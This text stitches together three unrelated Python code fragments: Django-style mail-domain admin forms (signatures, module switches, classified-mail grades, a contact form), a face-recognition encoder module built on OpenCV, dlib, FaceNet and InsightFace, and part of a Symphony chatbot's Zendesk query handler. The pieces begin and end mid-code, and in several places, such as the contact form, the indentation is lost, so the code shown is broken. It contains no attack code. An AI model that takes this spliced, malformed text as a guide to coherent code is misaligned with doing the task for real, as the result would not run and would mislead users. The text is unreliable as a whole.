    PARAM_NAME = dict(constants.DOMAIN_SIGN_PARAMS)
    PARAM_LIST = dict(constants.DOMAIN_SIGN_VALUE)
    PARAM_TYPE = dict(constants.DOMAIN_SIGN_TYPE)
    def initialize(self):
        self.initBasicParams()
        newData = self.post if self.post else self.get
        if "domain_id" in newData:
            self.domain_id = BaseFied(value=newData["domain_id"], error=None)
        try:
            oldData = json.loads(self.cf_domain_signature.value)
        except:
            oldData = {}
        oldData = {} if not isinstance(oldData, dict) else oldData
        self.content_html = oldData.get(u"html",u"")
        # Only new-format blobs store the HTML base64-encoded.
        if self.content_html and u"new" in oldData:
            self.content_html = base64.decodestring(self.content_html)
        self.content_text = oldData.get(u"text",u"")
        if newData:
            self.content_html = newData.get(u"content_html", u"")
            self.content_text = newData.get(u"content_text", u"-1")
            sw_domain_signature = newData.get("sw_domain_signature", "-1")
            self.sw_domain_signature = BaseFied(value=sw_domain_signature, error=None)
        saveData = {
            u"html" : get_unicode(base64.encodestring(get_string(self.content_html))),
            u"text" : self.content_text,
            u"new" : u"1", # compatibility marker for older versions
        }
        self.cf_domain_signature = BaseFied(value=json.dumps(saveData), error=None)
class DomainSignPersonalForm(DomainForm):
    """Default personal mail signature form.

    Persisted as one JSON blob (cf_personal_sign); the signature template is
    stored base64-encoded. applyAll() pushes the template to every mailbox
    in the domain as a 'domain'-type Signature row.
    """
    PARAM_NAME = dict(constants.DOMAIN_SIGN_PERSONAL_PARAMS)
    PARAM_LIST = dict(constants.DOMAIN_SIGN_PERSONAL_VALUE)
    PARAM_TYPE = dict(constants.DOMAIN_SIGN_PERSONAL_TYPE)
    PARAM_LIST_DEFAULT = dict(constants.DOMAIN_SIGN_PERSONAL_VALUE_DEFAULT)
    def initialize(self):
        self.initBasicParams()
        newData = self.post if self.post else self.get
        if "domain_id" in newData:
            self.domain_id = BaseFied(value=newData["domain_id"], error=None)
        try:
            oldData = json.loads(self.cf_personal_sign.value)
        except:
            oldData = {}
        oldData = {} if not isinstance(oldData, dict) else oldData
        # Populate attributes from stored data, falling back to defaults.
        for name, default in self.PARAM_LIST_DEFAULT.items():
            setattr(self, name, oldData.get(name, default) )
        if self.personal_sign_templ:
            self.personal_sign_templ = get_unicode(base64.decodestring(get_string(self.personal_sign_templ)))
        # Request data overrides the stored configuration.
        if newData:
            self.personal_sign_new = get_unicode(newData.get(u"personal_sign_new", u"-1"))
            self.personal_sign_forward = get_unicode(newData.get(u"personal_sign_forward", u"-1"))
            self.personal_sign_auto = get_unicode(newData.get(u"personal_sign_auto", u"-1"))
            self.personal_sign_templ = get_unicode(newData.get(u"content_html", u""))
        saveData = {
            u"personal_sign_new" : self.personal_sign_new,
            u"personal_sign_forward" : self.personal_sign_forward,
            u"personal_sign_auto" : self.personal_sign_auto,
            u"personal_sign_templ" : get_unicode(base64.encodestring(get_string(self.personal_sign_templ))),
        }
        self.cf_personal_sign = BaseFied(value=json.dumps(saveData), error=None)
        try:
            import HTMLParser
            html_parser = HTMLParser.HTMLParser()
            # Unescape so the HTML renders properly in the template preview.
            self.personal_sign_templ2 = html_parser.unescape(self.personal_sign_templ)
        except Exception,err:
            print str(err)
            self.personal_sign_templ2 = self.personal_sign_templ
    def applyAll(self):
        """Apply the template to every mailbox in the domain."""
        import cgi
        caption = _(u"系统默认签名")
        content = self.personal_sign_templ
        content = cgi.escape(content)
        content = get_unicode(content)
        is_default = "1" if self.personal_sign_new == "1" else "-1"
        is_fwd_default = "1" if self.personal_sign_forward == "1" else "-1"
        obj_list = Mailbox.objects.filter(domain_id=self.domain_id.value)
        for mailbox in obj_list:
            mailbox_id = mailbox.id
            # Create or update the per-mailbox 'domain' signature row.
            obj_sign = Signature.objects.filter(domain_id=self.domain_id.value, mailbox_id=mailbox_id, type="domain").first()
            if obj_sign:
                obj_sign.content = u"{}".format(content)
                obj_sign.default = u"{}".format(is_default)
                obj_sign.refw_default = u"{}".format(is_fwd_default)
                obj_sign.save()
            else:
                obj_sign = Signature.objects.create(
                    domain_id=u"{}".format(self.domain_id.value),
                    mailbox_id=u"{}".format(mailbox_id),
                    type=u"domain",
                    caption=u"{}".format(caption),
                    content=u"{}".format(content),
                    default=u"{}".format(is_default),
                    refw_default=u"{}".format(is_fwd_default),
                )
            # At most one signature may be the new-mail default per mailbox.
            if is_default == "1":
                Signature.objects.filter(domain_id=self.domain_id.value, mailbox_id=mailbox_id).update(default='-1')
                Signature.objects.filter(domain_id=self.domain_id.value, mailbox_id=mailbox_id, type="domain").update(default='1')
            else:
                Signature.objects.filter(domain_id=self.domain_id.value, mailbox_id=mailbox_id, type="domain").update(default='-1')
            # Same exclusivity for the reply/forward default.
            if is_fwd_default == "1":
                Signature.objects.filter(domain_id=self.domain_id.value, mailbox_id=mailbox_id).update(refw_default='-1')
                Signature.objects.filter(domain_id=self.domain_id.value, mailbox_id=mailbox_id, type="domain").update(refw_default='1')
            else:
                Signature.objects.filter(domain_id=self.domain_id.value, mailbox_id=mailbox_id, type="domain").update(refw_default='-1')
class DomainModuleHomeForm(DomainForm):
    """Home-page module visibility settings form."""
    PARAM_NAME = dict(constants.DOMAIN_MODULE_HOME_PARAMS)
    PARAM_LIST = dict(constants.DOMAIN_MODULE_HOME_VALUE)
    PARAM_TYPE = dict(constants.DOMAIN_MODULE_HOME_TYPE)
    def initPostParams(self):
        # Switches absent from the POST default to disabled.
        self.initPostParamsDefaultDisable()
class DomainModuleMailForm(DomainForm):
    """Mail module settings form.

    Tracks the previous value of sw_save_client_sent_email so save() can
    propagate a change to every mailbox user in the domain.
    """
    PARAM_NAME = dict(constants.DOMAIN_MODULE_MAIL_PARAMS)
    PARAM_LIST = dict(constants.DOMAIN_MODULE_MAIL_VALUE)
    PARAM_TYPE = dict(constants.DOMAIN_MODULE_MAIL_TYPE)
    def initialize(self):
        self.initBasicParams()
        # Remember the stored value before POST data overwrites it.
        self.sw_save_client_sent_email_old = self.sw_save_client_sent_email.value
        self.initPostParamsDefaultDisable()
    def save(self):
        super(DomainModuleMailForm, self).save()
        # If the switch changed, update the flag for every mailbox user.
        if self.sw_save_client_sent_email_old != self.sw_save_client_sent_email.value:
            for obj in Mailbox.objects.filter(domain_id=self.domain_id.value).all():
                obj_attr = MailboxUserAttr.objects.filter(mailbox_id=obj.id, item=u'save_client_sent').first()
                if not obj_attr:
                    obj_attr = MailboxUserAttr.objects.create(
                        domain_id=self.domain_id.value,
                        mailbox_id=obj.id,
                        item=u'save_client_sent',
                    )
                obj_attr.type = u"user"
                obj_attr.value = self.sw_save_client_sent_email.value
                obj_attr.save()
class DomainModuleSetForm(DomainForm):
    """Domain-level form for the "settings" module switches.

    ``sw_userbwlist`` is special: it is persisted on the ``userbwlist``
    column of the core ``Domain`` row instead of the generic param store.
    """
    PARAM_NAME = dict(constants.DOMAIN_MODULE_SET_PARAMS)
    PARAM_LIST = dict(constants.DOMAIN_MODULE_SET_VALUE)
    PARAM_TYPE = dict(constants.DOMAIN_MODULE_SET_TYPE)
    def initialize(self):
        self.initBasicParams()
        self.initPostParamsDefaultDisable()
        data = self.post if self.post else self.get
        # sw_userbwlist maps to core_domain.userbwlist, so handle it explicitly.
        if not data:
            domainObj = Domain.objects.filter(id=self.domain_id.value).first()
            sw_userbwlist = "-1" if not domainObj else domainObj.userbwlist
            self.sw_userbwlist = BaseFied(value=get_unicode(sw_userbwlist), error=None)
        else:
            self.sw_userbwlist = BaseFied(value=get_unicode(data.get("sw_userbwlist", "-1")), error=None)
    def check(self):
        return self.valid
    def save(self):
        domainObj = Domain.objects.filter(id=self.domain_id.value).first()
        # Guard against a missing/deleted domain row. initialize() already
        # tolerates it; previously this raised AttributeError on None.
        if domainObj is not None:
            domainObj.userbwlist = u"{}".format(self.sw_userbwlist.value)
            domainObj.save()
        self.paramSave()
class DomainModuleOtherForm(DomainForm):
    """Domain-level form for the "other" module feature switches."""
    PARAM_NAME = dict(constants.DOMAIN_MODULE_OTHER_PARAMS)  # param key -> display name
    PARAM_LIST = dict(constants.DOMAIN_MODULE_OTHER_VALUE)   # param key -> default value
    PARAM_TYPE = dict(constants.DOMAIN_MODULE_OTHER_TYPE)    # param key -> value type
    def initPostParams(self):
        # Params missing from POST are treated as disabled (base-class helper).
        self.initPostParamsDefaultDisable()
#Classified-mail (security grade) management
class DomainSecretForm(DotDict):
    """Form managing classified-mail (secret grade) mailbox assignments.

    Supported actions (read from GET/POST ``action``):
      * "new" - add mailboxes (``mailbox`` field, '|'-separated usernames)
        to the selected ``grade``.
      * "del" - remove SecretMail rows by id (``idlist``, '|'-separated).
    """
    def __init__(self, get=None, post=None, request=None):
        # The original used a mutable default (request={}), which is shared
        # across all calls; use None as the sentinel instead.
        self.request = request if request is not None else {}
        self.get = get or {}
        self.post = post or {}
        self.error = u""
        self.action = u""
        self.grade = constants.DOMAIN_SECRET_GRADE_1
        self.addList = []
        self.delList = []
        self.valid = True
        self.initialize()
    def initialize(self):
        data = self.post if self.post else self.get
        if data:
            self.action = data.get(u"action", u"")
            self.grade = data.get(u"grade", constants.DOMAIN_SECRET_GRADE_1)
            if self.action == u"new":
                boxList = data.get(u"mailbox", "")
                self.addList = [box.strip() for box in boxList.split("|") if box.strip()]
            if self.action == u"del":
                idList = data.get(u"idlist", "")
                self.delList = [box.strip() for box in idList.split("|") if box.strip()]
        # Expose per-grade counters as attributes gradeNum_1, gradeNum_2, ...
        for grade, name in constants.DOMAIN_SECRET_GRADE_ALL:
            # count() lets the database count rows instead of materializing
            # the whole queryset just to call len() on it.
            grade_num = SecretMail.objects.filter(secret_grade=grade).count()
            setattr(self, "gradeNum_{}".format(int(grade) + 1), grade_num)
    @staticmethod
    def getBoxListByGrade(grade):
        """Return [{'id': ..., 'mailbox': ...}] for every entry of *grade*."""
        dataList = []
        for d in SecretMail.objects.filter(secret_grade=grade):
            boxObj = Mailbox.objects.filter(id=d.mailbox_id).first()
            # Fall back to a "deleted account" label when the mailbox is gone.
            mailbox = _(u"已删除帐号") if not boxObj else boxObj.username
            dataList.append({
                "id": d.id,
                "mailbox": mailbox,
            })
        return dataList
    def is_valid(self):
        self.check()
        return self.valid
    def check(self):
        # Only the "new" action needs validation: every mailbox must exist.
        if self.action == u"new":
            for mailbox in self.addList:
                boxObj = Mailbox.objects.filter(username=mailbox).first()
                if not boxObj:
                    self.error = _(u"邮箱帐号不存在")
                    self.valid = False
                    return self.valid
        return self.valid
    def save(self):
        if self.action == u"new":
            for mailbox in self.addList:
                boxObj = Mailbox.objects.filter(username=mailbox).first()
                if not boxObj:
                    continue
                # Avoid duplicate (grade, mailbox) rows.
                obj = SecretMail.objects.filter(secret_grade=self.grade, mailbox_id=boxObj.id).first()
                if not obj:
                    SecretMail.objects.create(secret_grade=self.grade, mailbox_id=boxObj.id)
        if self.action == u"del":
            for entry_id in self.delList:
                SecretMail.objects.filter(id=entry_id).delete()
#Add a public (shared) address-book contact
class DomainPublicInputForm(DotDict):
def __init__(self, domain_id, instance=None, post=None, get=None, request={}):
self.request = request
self.post = post or {}
self.get = get or {}
self.error = u""
self.domain_id = int(domain_id)
self.instance = instance
self.valid = True
self.initialize()
def initialize(self):
self.fullname = BaseFied(value=u"", error=None)
self.cate_id = BaseFied(value=0, error=None)
self.gender = BaseFied(value=u"F", error=None)
self.birthday = BaseFied(value=u"", error=None)
self.pref_email = BaseFied(value=u"", error=None)
self.pref_tel = BaseFied(value=u"", error=None)
self.home_tel = BaseFied(value=u"", error=None)
self.work_tel = BaseFied(value=u"", error=None)
self.im_qq = BaseFied(value=u"", error=None)
self.im_msn = BaseFied(value=u"", error=None)
self.remark = BaseFied(value=u"", error=None)
data = self.post if self.post else self.get
if self.instance:
self.fullname = BaseFied(value=self.instance.fullname, error=None)
self.cate_id = BaseFied(value=self.instance.cate_id, error=None)
self.gender = BaseFied(value=self.instance.gender, error=None)
self.birthday = BaseFied(value=self.instance.birthday, error=None)
self.pref_email = BaseFied(value=self.instance.pref_email, error=None)
self.pref_tel = BaseFied(value=self.instance.pref_tel, | |
from __future__ import absolute_import, division, print_function
import os, random
import numpy as np
from enum import Enum
import cv2 # for FaceEncoderModels.LBPH, FaceEncoderModels.OPENFACE
import pickle # for FaceEncoderModels.OPENFACE and FaceEncoderModels.DLIBRESNET
from imutils import paths # for FaceEncoderModels.LBPH
from sklearn.preprocessing import LabelEncoder # for FaceEncoderModels
from classifier import FaceClassifierModels, FaceClassifier
from scipy import misc # for FaceDetector_FACENET
from image_utils import seriallize_face_encodings
from os.path import join
from scipy import misc
import mxnet as mx
# --- LBPH: OpenCV LBPH recognizer state + label encoder (written by training)
OUTPUT_LBPH_CLASSIFIER = 'lbph.yml'
OUTPUT_LBPH_LABELER = 'lbph_le.pickle'
# --- OpenFace: Torch embedding model (input) + classifier/label pickles
INPUT_OPENFACE_MODEL = 'openface_nn4.small2.v1.t7'
OUTPUT_OPENFACE_CLASSIFIER = 'openface_re.pickle'
OUTPUT_OPENFACE_LABELER = 'openface_le.pickle'
# --- dlib ResNet: embedding model + 5-point shape predictor (inputs)
INPUT_DLIBRESNET_MODEL = 'dlib_face_recognition_resnet_model_v1.dat'
INPUT_DLIBRESNET_MODEL2 = 'shape_predictor_5_face_landmarks.dat'
OUTPUT_DLIBRESNET_CLASSIFIER = 'dlib_re.pickle'
OUTPUT_DLIBRESNET_LABELER = 'dlib_le.pickle'
# --- FaceNet: frozen TensorFlow graph (input) + classifier/label pickles
INPUT_FACENET_MODEL = 'facenet_20180402-114759.pb'
OUTPUT_FACENET_CLASSIFIER = 'facenet_re.pickle'
OUTPUT_FACENET_LABELER = 'facenet_le.pickle'
# --- InsightFace: MXNet checkpoint given as "prefix,epoch"
INPUT_INSIGHTFACE_MODEL = 'model-r100-ii/model,0'
class FaceEncoderModels(Enum):
    """Identifiers for the available face-encoding back-ends."""
    LBPH = 0                 # [ML] LBPH Local Binary Patterns Histograms
    OPENFACE = 1             # [DL] OpenCV OpenFace
    DLIBRESNET = 2           # [DL] DLIB ResNet
    FACENET = 3              # [DL] FaceNet implementation by <NAME>
    # VGGFACE1_VGG16 = 4     # Refer to models\others\vggface_recognition
    # VGGFACE2_RESNET50 = 5  # Refer to models\others\vggface_recognition
    INSIGHTFACE = 6
    DEFAULT = LBPH           # alias for the LBPH member
class FaceEncoder():
    """Facade that delegates identify/train/encode to the back-end
    selected by *model* (see FaceEncoderModels)."""
    def __init__(self, model=FaceEncoderModels.DEFAULT, path=None, path_training=None, training=False):
        self._base = None
        if model == FaceEncoderModels.LBPH:
            self._base = FaceEncoder_LBPH(path, path_training, training)
        elif model == FaceEncoderModels.OPENFACE:
            self._base = FaceEncoder_OPENFACE(path, path_training, training)
        elif model == FaceEncoderModels.DLIBRESNET:
            self._base = FaceEncoder_DLIBRESNET(path, path_training, training)
        elif model == FaceEncoderModels.FACENET:
            self._base = FaceEncoder_FACENET(path, path_training, training)
        elif model == FaceEncoderModels.INSIGHTFACE:
            self._base = FaceEncoder_INSIGHTFACE(path, path_training)
    def identify(self, frame, face_rect, vec = None):
        """Return (face_id, confidence); ("Unknown", 0) on any failure.

        NOTE(review): LBPH/OpenFace/dlib back-ends define identify(frame,
        face_rect) without a vec parameter, so the 3-arg call below raises
        TypeError for them and is masked by the handler — confirm intended.
        """
        try:
            face_id, confidence = self._base.identify(frame, face_rect, vec)
            return face_id, confidence
        except Exception:  # was a bare except: don't swallow KeyboardInterrupt/SystemExit
            return "Unknown", 0
    def train(self, face_detector, path_dataset, verify=False, classifier=FaceClassifierModels.LINEAR_SVM):
        """Train the back-end; returns an error string on failure, None on success."""
        try:
            self._base.train(face_detector, path_dataset, verify, classifier)
            print("Note: Make sure you use the same models for training and testing")
        except Exception as ex:
            print(ex)
            return "Training failed! an exception occurred!"
    def encode(self, frame, face_rect = None, num_face = 1):
        """Return the embedding(s) for *frame* (delegated to the back-end)."""
        return self._base.encode(frame, face_rect, num_face)
class FaceEncoder_Utils():
    """Shared training helper: fit a classifier on embeddings and persist it."""
    def save_training(self, classifier, knownNames, knownEmbeddings, output_clf, output_le):
        """Fit *classifier* on (knownEmbeddings, labels derived from
        knownNames), print the training score, and pickle the fitted
        classifier to *output_clf* and the LabelEncoder to *output_le*."""
        le = LabelEncoder()
        labels = le.fit_transform(knownNames)
        clf = FaceClassifier(classifier)
        clf.fit(knownEmbeddings, labels)
        pred_score = clf.score(knownEmbeddings, labels)
        print("Prediction score: ", pred_score)
        # Context managers close the handles even on error (the original
        # open()/write()/close() sequence leaked on exceptions).
        with open(output_clf, "wb") as f:
            pickle.dump(clf, f)
        with open(output_le, "wb") as f:
            pickle.dump(le, f)
class FaceEncoder_LBPH():
    """LBPH (Local Binary Patterns Histograms) face encoder/recognizer."""
    def __init__(self, path=None, path_training=None, training=False):
        self._path_training = path_training
        self._label_encoder = None
        self._clf = cv2.face.LBPHFaceRecognizer_create()
        if not training:
            # Inference mode: load the trained recognizer and label encoder.
            self._clf.read(self._path_training + OUTPUT_LBPH_CLASSIFIER)
            with open(self._path_training + OUTPUT_LBPH_LABELER, "rb") as f:
                self._label_encoder = pickle.load(f)
    def identify(self, frame, face_rect):
        """Return (face_id, confidence) for the face at *face_rect* = (x, y, w, h)."""
        (x, y, w, h) = face_rect
        face = cv2.cvtColor(frame[y:y+h, x:x+w], cv2.COLOR_BGR2GRAY)
        label_id, confidence = self._clf.predict(face)
        # LBPH "confidence" is a distance; clamp for display consistency.
        confidence = min(confidence, 99.99)
        face_id = self._label_encoder.classes_[label_id]
        return face_id, confidence
    def train(self, face_detector, path_dataset, verify, classifier):
        """Train the LBPH recognizer from a directory-per-person dataset."""
        imagePaths = sorted(list(paths.list_images(path_dataset)))
        faceSamples = []
        knownNames = []
        for imagePath in imagePaths:
            frame = cv2.imread(imagePath, cv2.IMREAD_COLOR)
            # The person's name is the parent directory of the image.
            name = imagePath.split(os.path.sep)[-2]
            frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
            faces = face_detector.detect(frame)
            # Only the first detected face of each image is used for training.
            for face in faces:
                (x, y, w, h) = face
                faceSamples.append(frame_gray[y:y+h, x:x+w])
                knownNames.append(name)
                break
            if verify and len(faces) != 1:
                print("[WARNING] Image {} has {} faces ".format(imagePath, len(faces)))
                cv2.imshow('frame', frame)
                cv2.waitKey(10)
        if verify:
            cv2.destroyAllWindows()
        # Derive the integer ids directly from the LabelEncoder so the ids
        # stored in the recognizer always match le.classes_. The original
        # hand-rolled knownNames.index(name) scheme drifted as soon as any
        # person after the first had more than one image (index() returns a
        # list position, not a label), producing out-of-range ids at
        # predict() time.
        le = LabelEncoder()
        labels = le.fit_transform(knownNames)
        self._clf.train(faceSamples, np.array(labels))
        self._clf.write(self._path_training + OUTPUT_LBPH_CLASSIFIER)
        with open(self._path_training + OUTPUT_LBPH_LABELER, "wb") as f:
            pickle.dump(le, f)
class FaceEncoder_OPENFACE():
    """OpenFace encoder: 128-d embeddings via OpenCV's DNN Torch loader."""
    def __init__(self, path=None, path_training=None, training=False):
        self._path_training = path_training
        self._clf = None
        self._label_encoder = None
        self._embedder = cv2.dnn.readNetFromTorch(path + INPUT_OPENFACE_MODEL)
        if not training:
            # Inference mode: load the trained classifier and label encoder.
            with open(self._path_training + OUTPUT_OPENFACE_CLASSIFIER, "rb") as f:
                self._clf = pickle.load(f)
            with open(self._path_training + OUTPUT_OPENFACE_LABELER, "rb") as f:
                self._label_encoder = pickle.load(f)
    def identify(self, frame, face_rect):
        """Return (face_id, confidence_percent) for the face at *face_rect*."""
        vec = self.encode(frame, face_rect)
        predictions_face = self._clf.predict(vec)[0]
        best = np.argmax(predictions_face)
        confidence = predictions_face[best] * 100
        face_id = self._label_encoder.classes_[best]
        return face_id, confidence
    def encode(self, frame, face_rect):
        """Return the OpenFace embedding for the face crop at *face_rect*."""
        (x, y, w, h) = face_rect
        face = frame[y:y+h, x:x+w]
        faceBlob = cv2.dnn.blobFromImage(face, 1.0 / 255, (96, 96), (0, 0, 0), swapRB=True, crop=False)
        self._embedder.setInput(faceBlob)
        return self._embedder.forward()
    def train(self, face_detector, path_dataset, verify, classifier):
        """Embed every detected face in the dataset and fit a classifier."""
        knownEmbeddings = []
        knownNames = []
        for imagePath in sorted(list(paths.list_images(path_dataset))):
            # The person's name is the parent directory of the image.
            name = imagePath.split(os.path.sep)[-2]
            frame = cv2.imread(imagePath, cv2.IMREAD_COLOR)
            for face in face_detector.detect(frame):
                knownNames.append(name)
                knownEmbeddings.append(self.encode(frame, face).flatten())
        FaceEncoder_Utils().save_training(classifier, knownNames, knownEmbeddings,
            self._path_training + OUTPUT_OPENFACE_CLASSIFIER,
            self._path_training + OUTPUT_OPENFACE_LABELER)
class FaceEncoder_DLIBRESNET():
    """dlib ResNet encoder: 128-d face descriptors via dlib's embedding model."""
    def __init__(self, path=None, path_training=None, training=False):
        import dlib  # lazy loading
        self._path_training = path_training
        self._clf = None
        self._label_encoder = None
        self._embedder = dlib.face_recognition_model_v1(path + INPUT_DLIBRESNET_MODEL)
        self._shaper = dlib.shape_predictor(path + INPUT_DLIBRESNET_MODEL2)
        if not training:
            # Inference mode: load the trained classifier and label encoder.
            with open(self._path_training + OUTPUT_DLIBRESNET_CLASSIFIER, "rb") as f:
                self._clf = pickle.load(f)
            with open(self._path_training + OUTPUT_DLIBRESNET_LABELER, "rb") as f:
                self._label_encoder = pickle.load(f)
    def identify(self, frame, face_rect):
        """Return (face_id, confidence_percent) for the face at *face_rect*."""
        vec = self.encode(frame, face_rect)
        predictions_face = self._clf.predict(vec)[0]
        best = np.argmax(predictions_face)
        confidence = predictions_face[best] * 100
        face_id = self._label_encoder.classes_[best]
        return face_id, confidence
    def encode(self, frame, face_rect):
        """Return a (1, 128) dlib descriptor for the face at *face_rect*."""
        import dlib  # lazy loading
        (x, y, w, h) = face_rect
        rect = dlib.rectangle(x, y, x + w, y + h)
        frame_rgb = frame[:, :, ::-1]  # BGR -> RGB, as dlib expects
        shape = self._shaper(frame_rgb, rect)
        vec = self._embedder.compute_face_descriptor(frame_rgb, shape)
        return np.array([vec])
    def train(self, face_detector, path_dataset, verify, classifier):
        """Embed every detected face in the dataset and fit a classifier."""
        knownEmbeddings = []
        knownNames = []
        for imagePath in sorted(list(paths.list_images(path_dataset))):
            # The person's name is the parent directory of the image.
            name = imagePath.split(os.path.sep)[-2]
            frame = cv2.imread(imagePath, cv2.IMREAD_COLOR)
            for face in face_detector.detect(frame):
                knownNames.append(name)
                knownEmbeddings.append(self.encode(frame, face).flatten())
        FaceEncoder_Utils().save_training(classifier, knownNames, knownEmbeddings,
            self._path_training + OUTPUT_DLIBRESNET_CLASSIFIER,
            self._path_training + OUTPUT_DLIBRESNET_LABELER)
class FaceEncoder_FACENET():
    """FaceNet (TensorFlow) encoder using a frozen graph.

    Unlike the other encoders, identify() returns the TOP-5 candidate
    lists (face_ids, probabilities) instead of a single match.
    """
    # Class-level defaults; set_face_crop() overrides them per instance.
    _face_crop_size=160
    _face_crop_margin=0
    def __init__(self, path=None, path_training=None, training=False):
        import tensorflow as tf # lazy loading
        import facenet.src.facenet as facenet # lazy loading
        self._path_training = path_training
        self._sess = tf.Session()
        with self._sess.as_default():
            facenet.load_model(path + INPUT_FACENET_MODEL)
        if training == False:
            # Inference mode: load the trained classifier and label encoder.
            self._clf = pickle.loads(open(self._path_training + OUTPUT_FACENET_CLASSIFIER, "rb").read())
            self._label_encoder = pickle.loads(open(self._path_training + OUTPUT_FACENET_LABELER, "rb").read())
    def identify(self, frame, face_rect, vec = None): ##
        """Return the top-5 (face_id list, probability list) for the face.

        If *vec* is given, it is used as the precomputed embedding and
        *frame*/*face_rect* are ignored.
        """
        face_id = []
        confidence = [] # probability
        if vec is None:
            vec = self.encode(frame, face_rect)
        preds = self._clf.predict(vec) #get top n
        preds = preds[0, 0:]
        # Indices of predictions sorted by descending probability.
        sorted_inds = [i[0] for i in sorted(enumerate(-preds), key=lambda x:x[1])]
        # id = np.argmax(predictions_face)
        # confidence = predictions_face[id]
        # NOTE(review): assumes the classifier knows >= 5 classes; fewer
        # classes would raise IndexError here — confirm.
        for i in range(5):
            face_id.append(self._label_encoder.classes_[sorted_inds[i]])
            confidence.append(preds[sorted_inds[i]])
        return face_id, confidence
    def set_face_crop(self, crop_size, crop_margin):
        # Override the class-level crop defaults for this instance.
        self._face_crop_size = crop_size
        self._face_crop_margin = crop_margin
    def encode(self, frame, bounding_boxes=None, num_face = 1):
        """Return FaceNet embedding(s) for *frame*.

        With *bounding_boxes*, each box is cropped (with optional margin),
        resized and prewhitened; without, *frame* is assumed to be an
        already-aligned face. Returns a single embedding when num_face == 1,
        else the full batch; returns None on error.
        """
        try:
            import tensorflow as tf # lazy loading
            import facenet.src.facenet as facenet # lazy loading
            img_list = []
            if bounding_boxes is not None: # have multiple face in photo
                for bounding_boxe in bounding_boxes:
                    # NOTE(review): a single box with score < 0.50 aborts the
                    # whole batch (returns None), not just that box — confirm
                    # this is the intended behavior.
                    if (len(bounding_boxe) == 5 and bounding_boxe[4] < 0.50):
                        return None
                    else:
                        (x, y, w, h) = bounding_boxe
                        if self._face_crop_margin:
                            # Expand the crop by margin/2 on each side, clipped
                            # to the frame bounds.
                            (x, y, w, h) = (
                                max(x - int(self._face_crop_margin/2), 0),
                                max(y - int(self._face_crop_margin/2), 0),
                                min(x+w + int(self._face_crop_margin/2), frame.shape[1]) - x,
                                min(y+h + int(self._face_crop_margin/2), frame.shape[0]) - y)
                        # NOTE(review): scipy.misc.imresize was removed in
                        # scipy >= 1.3; this pins an old scipy.
                        face = misc.imresize(frame[y:y+h, x:x+w, :], (self._face_crop_size, self._face_crop_size), interp='bilinear')
                        prewhiten_face = facenet.prewhiten(face)
                        img_list.append(prewhiten_face)
            else: # face is aligned
                prewhiten_face = facenet.prewhiten(frame)
                img_list.append(prewhiten_face)
            # Tensor names are fixed by the frozen FaceNet graph.
            images_placeholder = tf.get_default_graph().get_tensor_by_name("input:0")
            embeddings = tf.get_default_graph().get_tensor_by_name("embeddings:0")
            phase_train_placeholder = tf.get_default_graph().get_tensor_by_name("phase_train:0")
            feed_dict = {images_placeholder: img_list, phase_train_placeholder: False}
            if num_face == 1:
                return self._sess.run(embeddings, feed_dict=feed_dict)[0]
            else:
                return self._sess.run(embeddings, feed_dict=feed_dict)
        except Exception as ex:
            print(ex)
            return None
    def train(self, face_detector, face_embeddings_path, verify, classifier):
        """Fit and persist a classifier from pre-serialized face encodings."""
        X, Y = seriallize_face_encodings(face_embeddings_path, 1)
        FaceEncoder_Utils().save_training(classifier, Y, X,
            self._path_training + OUTPUT_FACENET_CLASSIFIER,
            self._path_training + OUTPUT_FACENET_LABELER)
class FaceEncoder_INSIGHTFACE():
    def __init__(self, path, ga_model_path=None, gpu=0, image_size='112,112'):
        """Load the InsightFace (ArcFace) MXNet recognition model.

        path: directory containing INPUT_INSIGHTFACE_MODEL ("prefix,epoch").
        ga_model_path: unused — gender/age model loading is commented out.
        gpu: GPU device index. NOTE(review): mx.gpu() requires a CUDA build
        of MXNet; there is no CPU fallback here — confirm deployment target.
        image_size: "width,height" string for the model input, e.g. '112,112'.
        """
        #import tensorflow as tf
        # import mxnet as mx
        # from sklearn.decomposition import PCA
        from time import sleep
        from easydict import EasyDict as edict
        # from libinsightface.mtcnn_detector import MtcnnDetector
        # sys.path.append(join(dirname(__file__), '..', 'src', 'common'))
        # from libinsightface.common import face_image
        # from ibinsightface.common import face_preprocess
        # self.args = args
        model = join(path, INPUT_INSIGHTFACE_MODEL)
        ctx = mx.gpu(gpu)
        # image_size arrives as "w,h"; convert to an (int, int) tuple.
        _vec = image_size.split(',')
        assert len(_vec)==2
        image_size = (int(_vec[0]), int(_vec[1]))
        self.model = None
        self.ga_model = None
        if len(model)>0:
            self.model = self.get_model(ctx, image_size, model, 'fc1')
        # if len(ga_model)>0:
        #   self.ga_model = self.get_model(ctx, image_size, ga_model, 'fc1')
        # self.threshold = threshold
        # self.det_minsize = 50
        # self.det_threshold = [0.6,0.7,0.8]
        # #self.det_factor = 0.9
        # self.image_size = image_size
        # mtcnn_path = os.path.join(os.path.dirname(__file__), 'mtcnn-model')
        # if det==0:
        #   detector = MtcnnDetector(model_folder=mtcnn_path, ctx=ctx, num_worker=1, accurate_landmark = True, threshold=self.det_threshold)
        # else:
        #   detector = MtcnnDetector(model_folder=mtcnn_path, ctx=ctx, num_worker=1, accurate_landmark = True, threshold=[0.0,0.0,0.2])
        # self.detector = detector
def get_model(self, ctx, image_size, model_str, layer):
# import mxnet as mx
_vec = model_str.split(',')
assert len(_vec)==2
| |
Zendesk " + str(role))
#################################################
botlog.LogSymphonyInfo(str(firstName) + " " + str(lastName) + " (" + str(displayName) + ") from Company/Pod name: " + str(
companyName) + " with UID: " + str(userID))
callerCheck = (str(firstName) + " " + str(lastName) + " - " + str(displayName) + " - " + str(companyName) + " - " + str(userID))
except:
return messageDetail.ReplyToChat("I was not able to run the zendesk query, please try again")
if callerCheck in AccessFile and isAllowed:
streamType = (messageDetail.ChatRoom.Type)
#print(streamType)
botlog.LogSymphonyInfo("User is part of the Agent list and is an Admin or Agent on Zendesk")
caller_raw = messageDetail.Sender.Name
caller_split = str(caller_raw).split(" ")
caller = caller_split[0]
# Parse the input
query = ""
results = ""
isIM = ""
message = (messageDetail.Command.MessageText)
message_split = message.split("|")
try:
userSplit = message_split[0]
userEntered = True
except:
userSplit = ""
userEntered = False
try:
organization = str(message_split[1])
orgEntered = True
except:
organization = ""
orgEntered = False
####################################
headers = {
'username': _configDef['zdesk_config']['zdesk_email'] + "/token",
'password': _configDef['zdesk_config']['zdesk_password'],
'authorization': _configDef['zdesk_config']['zdesk_auth'],
'cache-control': "no-cache",
'Content-Type': 'application/json',
}
